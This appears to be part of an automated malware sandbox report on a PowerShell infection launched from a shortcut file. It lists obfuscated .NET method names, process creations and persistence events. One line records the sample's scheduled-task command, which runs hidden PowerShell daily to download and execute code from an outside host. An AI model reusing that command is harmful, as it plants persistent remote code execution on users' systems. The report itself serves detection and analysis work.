                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, LBYA0evL6b2qx5MRZx.csHigh entropy of concatenated method names: 'ugqPkjKe9', 'mD3GbeT7O', 'guoaMl2UK', 'H9yuVPJvD', 'it098oxaj', 'dF33FYoAW8wjVVsvnMc', 'YD0EkcoBT3amssAdxIC', 'ayAhY1ohdVS4SMvMH2w', 'ahwgBnoNDiuJgk0OF3b', 'bvKtwYoSmeCAXQGqqli'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'nWKSb5oXEYZxLYo3a7f', 'qXE8PNogVuymfNLCDit', 'FnPmChosZAQoVFrogmS', 'PvRDAwocS1KnnZhtKUq', 'MoveNext', 'MoveNext'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Sign.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'VwWaW9o9WeoYr7aWDFa', 'pL4lUPoaFbMnNY4esCG', 'vpdADBou2cQQfSXObD7', 'R5UZLgor1vwKAWF6Z6b', 'MoveNext', 'MoveNext'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csHigh entropy of concatenated method names: 'HGPmyoptGt1t6nR0V2T', 'xb55URpQ0yOmbUhCA6H', 'yOqJqENYBw', 'l46axxpKmlRURjD42MC', 'XQd3Lepx2BkY3b0L2TQ', 'GKU7vFpmh0WKWOOUq6d', 'PoqdA2pvjpKkHbbqBAc', 'ak7HNpp7IVqn80OHvQu', 'HP8cJRpPeUd5vxEkG8v', 'iHGmT2pGP5HJXvkGfSW'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, wngJyl0pkVdxfZA3xe.csHigh entropy of concatenated method names: 'uOjbdP5Ir', 'cZDoLm9Sx', 'ohdhYdZ9H', 'L1MNLj68E', 'hAqAZObAGSVKei7UAaY', 'Y78JTdbB45WSaTPcY9d', 'WFMjcbbSjR5kkN1WA8n', 'yKEvG1bhFrilk1A8tWR', 'vAd11fbN2FP7CSCe3rc', 'QkA5tBbe9bIVZpIt8AA'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, NtJ1F8gX8IygiwNn6CY.csHigh entropy of concatenated method names: 'p3kgCB5Qtj', 'rFTgJGYUd1', 'SuhgdvI69U', 'u9ugj4JVpi', 'MWfgWUFngy', 'UX2jn5hXj06XODXjFXm', 'ufiC51hcCQYv9Ffb1TL', 'yGZHKghCcAGMH9B4GtM', 'xV1fQuhgCFfe9Z5WH1Y', 'cCWXHBhsRk7ifUleXEa'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, xK86rc8IIFQvpTK86E.csHigh entropy of concatenated method names: 'CKblKA6tt', 'uouJCZoI2JZZyOpkkui', 'Bb6WxLo3RNxppScAsCQ', 'zhsDrCoKR8f5Nhliehv', 'N3P2kHox4A1BsjWCaQ2', 'B2TNmGomDID3IUpWeAQ', 'WhOB41oQwALxfGxwcdI', 'gQ3I2Oo6uRPiO9D8MHK'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, mDjY1cgTFE8RrvZDo4g.csHigh entropy of concatenated method names: 'StZlrSNEWbrXKWKi0yW', 'XaR7v9N5y7WAnynoXJm', 'dbxAfSNYKl70hRhCh3n', 'kxexIENTLUvhuRpQCe4', 'l2ngnteNBA', 'PfWgyl0Lne', 'pZfgMgDTbM', 'MU6giItff2', 'fYtgFXM55u', 'THwgVllmhn'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, dTZB8EdvjAeBkimISAg.csHigh entropy of concatenated method names: 'IiyYsTljDO', 'x2EYX1tGXZ', 'MFyYcqUPmF', 'AWqYC1J9Cp', 'NgkYJnvU9d', 'efeYdKGBxc', 'iyrYjc3wp0', 'g3VjUrt0a4', 'KeFYWIQfJD', 'VWBYOIsRS7'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, oNllOt5kgusWceQgKL.csHigh entropy of concatenated method names: 'D3g672bdFkutYQDjZDf', 'nTcpEebjwBXrbNYL2uK', 'j0UjC7bCP1FPGBVEIIH', 'DBV2M1bJjLkOP44tF6g', 'ougAR5bWhYlBfWkHW6N', 'K3KvKVbOVG8Ha0xvu3r'
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, uQLX66g1Rw65j2XYif6.csHigh entropy of concatenated method names: 'rh1sJRe9WW', 'iZ7sdBrVNB', 'N9RsjMvWVw', 'AQEsWK87cg', 'IsssO3GOw4', 'yUrsUd9roa', 'aIEZnJBcZr5dpcUcXrN', 'OQVcWtBCcwf6UT513wT', 'ejCxRQBJDfhkFGt8aEN', 'RbIY1HBdkolS0dliMy2'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, YKZstLdMWqcuhh0SHwv.csHigh entropy of concatenated method names: 'r8gxb8ODvG', 'gL9xoZHim2', 'WtqRQLDj4GGwE9eHS3L', 'jZdqI4DWYeyueB7Yg0x', 'R0rdEsDOKickIwTArjx', 'mrpBPADUVUJq2n6yjNB', 'mHs9dwD4hwwnbLbXr6o'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, LBYA0evL6b2qx5MRZx.csHigh entropy of concatenated method names: 'ugqPkjKe9', 'mD3GbeT7O', 'guoaMl2UK', 'H9yuVPJvD', 'it098oxaj', 'dF33FYoAW8wjVVsvnMc', 'YD0EkcoBT3amssAdxIC', 'ayAhY1ohdVS4SMvMH2w', 'ahwgBnoNDiuJgk0OF3b', 'bvKtwYoSmeCAXQGqqli'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'nWKSb5oXEYZxLYo3a7f', 'qXE8PNogVuymfNLCDit', 'FnPmChosZAQoVFrogmS', 'PvRDAwocS1KnnZhtKUq', 'MoveNext', 'MoveNext'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Sign.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'VwWaW9o9WeoYr7aWDFa', 'pL4lUPoaFbMnNY4esCG', 'vpdADBou2cQQfSXObD7', 'R5UZLgor1vwKAWF6Z6b', 'MoveNext', 'MoveNext'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Yo82VwCRV3UT8r6biQk.csHigh entropy of concatenated method names: 'HGPmyoptGt1t6nR0V2T', 'xb55URpQ0yOmbUhCA6H', 'yOqJqENYBw', 'l46axxpKmlRURjD42MC', 'XQd3Lepx2BkY3b0L2TQ', 'GKU7vFpmh0WKWOOUq6d', 'PoqdA2pvjpKkHbbqBAc', 'ak7HNpp7IVqn80OHvQu', 'HP8cJRpPeUd5vxEkG8v', 'iHGmT2pGP5HJXvkGfSW'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, wngJyl0pkVdxfZA3xe.csHigh entropy of concatenated method names: 'uOjbdP5Ir', 'cZDoLm9Sx', 'ohdhYdZ9H', 'L1MNLj68E', 'hAqAZObAGSVKei7UAaY', 'Y78JTdbB45WSaTPcY9d', 'WFMjcbbSjR5kkN1WA8n', 'yKEvG1bhFrilk1A8tWR', 'vAd11fbN2FP7CSCe3rc', 'QkA5tBbe9bIVZpIt8AA'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, NtJ1F8gX8IygiwNn6CY.csHigh entropy of concatenated method names: 'p3kgCB5Qtj', 'rFTgJGYUd1', 'SuhgdvI69U', 'u9ugj4JVpi', 'MWfgWUFngy', 'UX2jn5hXj06XODXjFXm', 'ufiC51hcCQYv9Ffb1TL', 'yGZHKghCcAGMH9B4GtM', 'xV1fQuhgCFfe9Z5WH1Y', 'cCWXHBhsRk7ifUleXEa'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, xK86rc8IIFQvpTK86E.csHigh entropy of concatenated method names: 'CKblKA6tt', 'uouJCZoI2JZZyOpkkui', 'Bb6WxLo3RNxppScAsCQ', 'zhsDrCoKR8f5Nhliehv', 'N3P2kHox4A1BsjWCaQ2', 'B2TNmGomDID3IUpWeAQ', 'WhOB41oQwALxfGxwcdI', 'gQ3I2Oo6uRPiO9D8MHK'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, mDjY1cgTFE8RrvZDo4g.csHigh entropy of concatenated method names: 'StZlrSNEWbrXKWKi0yW', 'XaR7v9N5y7WAnynoXJm', 'dbxAfSNYKl70hRhCh3n', 'kxexIENTLUvhuRpQCe4', 'l2ngnteNBA', 'PfWgyl0Lne', 'pZfgMgDTbM', 'MU6giItff2', 'fYtgFXM55u', 'THwgVllmhn'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, dTZB8EdvjAeBkimISAg.csHigh entropy of concatenated method names: 'IiyYsTljDO', 'x2EYX1tGXZ', 'MFyYcqUPmF', 'AWqYC1J9Cp', 'NgkYJnvU9d', 'efeYdKGBxc', 'iyrYjc3wp0', 'g3VjUrt0a4', 'KeFYWIQfJD', 'VWBYOIsRS7'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, oNllOt5kgusWceQgKL.csHigh entropy of concatenated method names: 'D3g672bdFkutYQDjZDf', 'nTcpEebjwBXrbNYL2uK', 'j0UjC7bCP1FPGBVEIIH', 'DBV2M1bJjLkOP44tF6g', 'ougAR5bWhYlBfWkHW6N', 'K3KvKVbOVG8Ha0xvu3r'
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, uQLX66g1Rw65j2XYif6.csHigh entropy of concatenated method names: 'rh1sJRe9WW', 'iZ7sdBrVNB', 'N9RsjMvWVw', 'AQEsWK87cg', 'IsssO3GOw4', 'yUrsUd9roa', 'aIEZnJBcZr5dpcUcXrN', 'OQVcWtBCcwf6UT513wT', 'ejCxRQBJDfhkFGt8aEN', 'RbIY1HBdkolS0dliMy2'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, YKZstLdMWqcuhh0SHwv.csHigh entropy of concatenated method names: 'r8gxb8ODvG', 'gL9xoZHim2', 'WtqRQLDj4GGwE9eHS3L', 'jZdqI4DWYeyueB7Yg0x', 'R0rdEsDOKickIwTArjx', 'mrpBPADUVUJq2n6yjNB', 'mHs9dwD4hwwnbLbXr6o'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, LBYA0evL6b2qx5MRZx.csHigh entropy of concatenated method names: 'ugqPkjKe9', 'mD3GbeT7O', 'guoaMl2UK', 'H9yuVPJvD', 'it098oxaj', 'dF33FYoAW8wjVVsvnMc', 'YD0EkcoBT3amssAdxIC', 'ayAhY1ohdVS4SMvMH2w', 'ahwgBnoNDiuJgk0OF3b', 'bvKtwYoSmeCAXQGqqli'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, WsClient.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'nWKSb5oXEYZxLYo3a7f', 'qXE8PNogVuymfNLCDit', 'FnPmChosZAQoVFrogmS', 'PvRDAwocS1KnnZhtKUq', 'MoveNext', 'MoveNext'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Sign.csHigh entropy of concatenated method names: 'MoveNext', 'MoveNext', 'SetStateMachine', 'SetStateMachine', 'VwWaW9o9WeoYr7aWDFa', 'pL4lUPoaFbMnNY4esCG', 'vpdADBou2cQQfSXObD7', 'R5UZLgor1vwKAWF6Z6b', 'MoveNext', 'MoveNext'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Yo82VwCRV3UT8r6biQk.csHigh entropy of concatenated method names: 'HGPmyoptGt1t6nR0V2T', 'xb55URpQ0yOmbUhCA6H', 'yOqJqENYBw', 'l46axxpKmlRURjD42MC', 'XQd3Lepx2BkY3b0L2TQ', 'GKU7vFpmh0WKWOOUq6d', 'PoqdA2pvjpKkHbbqBAc', 'ak7HNpp7IVqn80OHvQu', 'HP8cJRpPeUd5vxEkG8v', 'iHGmT2pGP5HJXvkGfSW'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, wngJyl0pkVdxfZA3xe.csHigh entropy of concatenated method names: 'uOjbdP5Ir', 'cZDoLm9Sx', 'ohdhYdZ9H', 'L1MNLj68E', 'hAqAZObAGSVKei7UAaY', 'Y78JTdbB45WSaTPcY9d', 'WFMjcbbSjR5kkN1WA8n', 'yKEvG1bhFrilk1A8tWR', 'vAd11fbN2FP7CSCe3rc', 'QkA5tBbe9bIVZpIt8AA'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, NtJ1F8gX8IygiwNn6CY.csHigh entropy of concatenated method names: 'p3kgCB5Qtj', 'rFTgJGYUd1', 'SuhgdvI69U', 'u9ugj4JVpi', 'MWfgWUFngy', 'UX2jn5hXj06XODXjFXm', 'ufiC51hcCQYv9Ffb1TL', 'yGZHKghCcAGMH9B4GtM', 'xV1fQuhgCFfe9Z5WH1Y', 'cCWXHBhsRk7ifUleXEa'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, xK86rc8IIFQvpTK86E.csHigh entropy of concatenated method names: 'CKblKA6tt', 'uouJCZoI2JZZyOpkkui', 'Bb6WxLo3RNxppScAsCQ', 'zhsDrCoKR8f5Nhliehv', 'N3P2kHox4A1BsjWCaQ2', 'B2TNmGomDID3IUpWeAQ', 'WhOB41oQwALxfGxwcdI', 'gQ3I2Oo6uRPiO9D8MHK'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, mDjY1cgTFE8RrvZDo4g.csHigh entropy of concatenated method names: 'StZlrSNEWbrXKWKi0yW', 'XaR7v9N5y7WAnynoXJm', 'dbxAfSNYKl70hRhCh3n', 'kxexIENTLUvhuRpQCe4', 'l2ngnteNBA', 'PfWgyl0Lne', 'pZfgMgDTbM', 'MU6giItff2', 'fYtgFXM55u', 'THwgVllmhn'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, dTZB8EdvjAeBkimISAg.csHigh entropy of concatenated method names: 'IiyYsTljDO', 'x2EYX1tGXZ', 'MFyYcqUPmF', 'AWqYC1J9Cp', 'NgkYJnvU9d', 'efeYdKGBxc', 'iyrYjc3wp0', 'g3VjUrt0a4', 'KeFYWIQfJD', 'VWBYOIsRS7'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, oNllOt5kgusWceQgKL.csHigh entropy of concatenated method names: 'D3g672bdFkutYQDjZDf', 'nTcpEebjwBXrbNYL2uK', 'j0UjC7bCP1FPGBVEIIH', 'DBV2M1bJjLkOP44tF6g', 'ougAR5bWhYlBfWkHW6N', 'K3KvKVbOVG8Ha0xvu3r'
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, uQLX66g1Rw65j2XYif6.csHigh entropy of concatenated method names: 'rh1sJRe9WW', 'iZ7sdBrVNB', 'N9RsjMvWVw', 'AQEsWK87cg', 'IsssO3GOw4', 'yUrsUd9roa', 'aIEZnJBcZr5dpcUcXrN', 'OQVcWtBCcwf6UT513wT', 'ejCxRQBJDfhkFGt8aEN', 'RbIY1HBdkolS0dliMy2'

                  Persistence and Installation Behavior

                  barindex
                  Windows shortcut file (LNK) starts blacklisted processes
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 103
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 103Jump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn CleanerRes /tr "conhost.exe --headless powershell.exe -c irm http://drive.desktopserver.top/file/| Powershell" /sc daily /st 09:00 /f
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
